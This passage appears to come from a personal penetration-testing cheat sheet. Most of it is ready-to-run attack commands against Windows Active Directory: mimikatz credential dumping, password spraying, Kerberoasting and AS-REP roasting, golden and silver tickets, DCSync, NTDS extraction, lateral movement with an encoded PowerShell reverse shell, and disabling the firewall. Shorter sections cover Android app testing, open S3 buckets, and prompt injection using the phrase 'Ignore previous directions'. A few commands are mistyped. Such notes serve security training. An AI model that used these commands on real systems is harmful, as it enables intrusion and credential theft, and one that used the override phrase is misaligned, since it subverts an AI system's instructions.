"<SID>", "<SID>", "<SID>", "<SID>", ... | Convert-SidToName Convert <SID>s into names
Get-ObjectAcl -Identity "<group>" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier,ActiveDirectoryRights Enumerat ACLs for <group>, only display values equal to GenericAll
Find-DomainShare Find Domain Shares
Import-Module .\Sharphound.ps1 Import SharpHound; https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1
Get-Help Invoke-BloodHound Learn more about Invoke-BloodHound; To run SharpHound you must first start BloodHound
Invoke-BloodHound -CollectionMethod All -OutputDirectory <DIR> -OutputPrefix "corp audit" Collect domain data
- Note: you need to start Neo4j first with
sudo neo4j start
and then use the commandbloodhound
to start BloodHound. - Default credentials for Neo4j:
neo4j:neo4j
- Log in BloodHound with Neo4j's credentials
- Upload here the zip created with SharpHound
- Pre-built queries
- Find Workstations where Domain Users can RDP
- Find Servers where Domain Users can RDP
- Find Computers where Domain Users are Local Admin
- Shortest Path to Domain Admins from Owned Principals
- Custom queries
MATCH (m:Computer) RETURN m
to display all computersMATCH p = (c:Computer)-[:HasSession]->(m:User) RETURN p
to display all active sessions
After starting mimikatz.exe
, run the command privilege::debug
to enable SeDebugPrivilege
and run token::elevate
sekurlsa::logonpasswords Dump the credentials of all logged-on users
sekurlsa::tickets Tickets stored in memory
crypto::capi Make non-exportable keys exportable; CryptoAPI function
crypto::cng Make non-exportable keys exportable; KeyIso service
lsadump::dcsync /user:<domain>\<user> Domain Controller Synchronization
sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<hash> /run:powershell Overpass the Hash
Other commands to run
log
lsadump::sam
lsadump::secrets
lsadump::cache
lsadump::ekeys
sekurlsa::msv
With LDAP and ADSI
- Before any attack, check
net accounts
to learn more about account lockouts - Use the script Spray-Passwords.ps1
- Search wich user has the password
SecretPass123!
with.\Spray-Passwords.ps1 -Pass SecretPass123! -Admin
- Remember to run
powershell -ep bypass
before using scripts
- Search wich user has the password
Leveraging SMB
crackmapexec smb <IP> -u users.txt -p 'SecretPass123!' -d <domain-name> --continue-on-success
Password sprayingcrackmapexec smb <domain_name>/<username>:'abd132' -M targets.txt
Spray a specified passwordabd132
against all domain joined machines contained intargets.txt
- Note: this doesn't take in consideration the password policy of the domain
By obtaining a TGT
- It's possible to use kinit to obtain and cache a Kerberos TGT and automate the process with a script
- It's also possible to use kerbrute instead
.\kerbrute_windows_amd64.exe passwordspray -d <domain-name> .\usernames.txt "SecretPass123!"
On Linux
impacket-GetNPUsers -dc-ip <IP-Domain-Controller> -request -outputfile <outuput_file.asreproast> <domain>/<user>
perform AS-REP roastingsudo hashcat -m 18200 outuput_file.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
crack the AS-REP hash
On Windows
- With Rubeus,
.\Rubeus.exe asreproast /nowrap
perform AS-REP roasting sudo hashcat -m 18200 outuput_file.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
crack the AS-REP hash
On Linux
sudo impacket-GetUserSPNs -request -dc-ip <IP-Domain-Controller> <domain>/<user>
perform Kerberoastingsudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
crack the TGS-REP hash
On Windows
- With Rubeus,
.\Rubeus.exe kerberoast /outfile:hashes.kerberoast
perform Kerberoasting sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
crack the TGS-REP hash
To create a silver ticket, you need:
- SPN password hash
- Domain SID
- Target SPN
- With mimikatz, run the commands
privilege::debug
andsekurlsa::logonpasswords
to extract cached AD credentials. Note the NTLM hash of the target user - Run on the PowerShell the command
whoami /user
to obtain the domain SID (omit the last 4 digits). Note: you should be able to find it also in the previous step - Target an SPN
- Run
kerberos::golden /sid:<SID> /domain:<DOMAIN> /ptt /target:<TARGET> /service:<SERVICE> /rc4:<NTLM-HASH> /user:<USER>
- Confirm that you have the ticket ready to use in memory with
klist
On Linux
impacket-secretsdump -just-dc-user <target-user> <domain>/<user>:"<password>"@<IP>
- Crack the NTLM hash with
hashcat -m 1000 hashes.dcsync /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
On Windows
- In mimikatz, run the command
lsadump::dcsync /user:<domain>\<user>
, note the Hash NTLM - Crack the NTLM hash with
hashcat -m 1000 hashes.dcsync /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
- Create a PSCredential object that stores session's username and password
$username = '<username>'; $password = '<password>'; $secureString = ConvertTo-SecureString $password -AsPlaintext -Force; $credential = New-Object System.Management.Automation.PSCredential $username, $secureString;
- Create a Common Information Model
$options = New-CimSessionOption -Protocol DCOM $session = New-Cimsession -ComputerName <IP> -Credential $credential -SessionOption $options $command = 'calc';
- Tie all together with
Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command};
Another lateral movement
winrs -r:<target> -u:<username> -p:<password> "cmd /c hostname & whoami"
winrs -r:<target> -u:<username> -p:<password> "powershell -nop -w hidden -e <BASE64>"
PowerShell remoting
$username = '<username>';
$password = '<password>';
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;
New-PSSession -ComputerName <IP> -Credential $credential
- To interact with the session, run the command
Enter-PSSession <SESSION-ID>
./PsExec64.exe -i \\<TARGET> -u <DOMAIN>\<USERNAME> -p <PASSWORD> cmd
Requirements
- The user that authenticates to the target machine needs to be part of the Administrators local group
- An SMB connection through the firewall
- The
ADMIN$
share must be available - File and Printer Sharing has to be turned on
/usr/bin/impacket-wmiexec -hashes :<hash> <username>@<IP>
Requirements
- An SMB connection through the firewall
- The
ADMIN$
share must be available - The attacker must present valid credentials with local administrative permission
- Run the Notepad with
Run as different user
to cache the credentials on the machine - Run mimikatz. Execute the commands
privilege::debug
andsekurlsa::logonpasswords
to dump the password hash for the user just used - Now, in mimikatz, execute the command
sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<hash> /run:powershell
to run a PowerShell - Authenticate to a network share of the target
net use \\<target>
- Use
klist
to notice the newly requested Kerberos tickets, including a TGT and a TGS for the Common Internet File System (CIFS) - Now you can run
.\PsExec.exe \\<target> cmd
- Verify that you are not able to access to a restricted shared folder
- Run mimikatz. Execute
#privilege::debug
#sekurlsa::tickets /export
export all the TGT/TGS from memory- Verify generated tickets with
PS:\> dir *.kirbi
- Inject a ticket from mimikatz with
kerberos::ptt <ticket_name>
- Inspect the injected ticket with
C:\> klist
- Access the restricted shared folder
$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","<IP>"))
remotely Instantiate the MMC Application object$dcom.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c calc","7")
execute a command on the remote DCOM object$dcom.Document.ActiveView.ExecuteShellCommand("powershell",$null,"powershell -nop -w hidden -e <BASE64>","7")
reverse shell, run a listener withnc -lnvp 443
- Run mimikatz, execute the command
privilege::debug
lsadump::lsa /patch
dump the krbtgt password hash- Run
kerberos::purge
kerberos::golden /user:<USER> /domain:corp.com /sid:<SID> /krbtgt:<NTLM> /ptt
inject the golden ticket
vshadow.exe -nw -p C:
perform a shadow copy of theC:
drivecopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\ntds\ntds.dit c:\ntds.dit.bak
copy the ntds database to the C: drivereg.exe save hklm\system c:\system.bak
save the SYSTEM hive from the Windows registryimpacket-secretsdump -ntds ntds.dit.bak -system system.bak LOCAL
extract the credential materials
# enable RDP
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0
# enable RDP pass the hash
New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value "0" PropertyType DWORD -Force
# enable RDP and add user
reg add "HEY_LOCAL _MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" / fDenyTSConnections /t REG_DWORD /d 0 /f
reg add HKLM\System \CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f netsh advfirewall set allprofiles state off
net localgroup "remote desktop users" <USER. NAME> / add
FlappyBird_structure.apk
├── AndroidManifest.xml meta-information about the app
├── META-INF/ a manifest of metadata information
├── classes.dex contains the Java libraries that the application uses
├── lib/ compiled native libraries used by the app
├── res/ It can store resource files such as pictures, XML files, etc.
├── assets/ application assets
└── resources.arsc contains compiled resources in a binary format
Data storage search for PII unencrypted in
- Phone system logs
- Webkit cache
- Dbs, plists, etc.
- Hardcoded in the binary
Resources
- Mobile Application Penetration Testing Cheat Sheet
- Mobile Hacking Cheatsheet
- OWASP Mobile Application Security
Download APKs
Emulators
- Noxplayer
- Genymotion an android emulator
- Android Studio Android application development, useful also for the emulator
- Note: to start only the emulator, use commands such as
cd C:\Users\Riccardo\AppData\Local\Android\Sdk\emulator emulator -avd Pixel_4_XL_API_30
- Note: to start only the emulator, use commands such as
Android tools
- adb it is used to debug an android device
- frida
- HTTP Toolkit to see requests on a non-rooted or emulated device
- Java Decompiler
- dex2jar decompile an .apk into .jar
- jadx-gui another tool for producing Java source code from Android Dex and Apk files
- apktool to unpack an apk
- APK-MITM removes certificate pinning
- Apkleak to get endpoints from an apk
- Frida
Absence or improper implementation of certificate and public key pinning in a mobile app. This allows an attacker to potentially intercept communication by presenting fraudulent or unauthorized certificates, undermining the security of the system and enabling man-in-the-middle attacks.
- Check for HTML injections
- Search for XSS
Resources
- cloud_metadata.txt, Cloud Metadata Dictionary useful for SSRF Testing
Target example: http://[name_of_bucket].s3.amazonaws.com
Read Permission
aws s3 ls s3://[name_of_bucket] --no-sign-request
aws s3 ls s3://pyx-pkgs --recursive --human-readable --summarize
Write Permission
aws s3 cp localfile s3://[name_of_bucket]/test_file.txt –-no-sign-request
READ_ACP
aws s3api get-bucket-acl --bucket [bucketname] --no-sign
aws s3api get-object-acl --bucket [bucketname] --key index.html --no-sign-request
WRITE_ACP
aws s3api put-bucket-acl --bucket [bucketname] [ACLPERMISSIONS] --no-sign-request
aws s3api put-object-acl --bucket [bucketname] --key file.txt [ACLPERMISSIONS] --no-sign-request
Tools
- Anonymous Cloud
- AWS CLI
- S3Scanner A tool to find open S3 buckets and dump their contents
- Cloud - AWS Pentest
- s3enum
- To find secrets, you can use trufflehog.
Resources
If you've found aws cognito client id and secret
clientID:clientSercret
=>base64KEY
curl -X POST 'https://xx.amazoncognito.com/oauth2/token' \ -H 'Authorization: Basic base64KEY'\ -H 'Content-Type: application/x-www-form-urlencoded' \ -d 'grant_type=client_credentials'
- Source
Tools
Resources
- https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/
- https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/
Prompt Injection is when an AI that follows textual instructions (a "prompt") to complete a job gets deceived by hostile, adversarial human input to do a task that was not its original goal. To test it, inject the text Ignore previous directions
.
Some examples:
- "Exploiting GPT-3 prompts with malicious inputs that order the model to ignore its previous directions"
- "OpenAI’s ChatGPT is susceptible to prompt injection — say the magic words, “Ignore previous directions”, and it will happily divulge to you OpenAI’s proprietary prompt"
- Exploring Prompt Injection Attacks
- "Prompt Injection Everywhere" by TakSec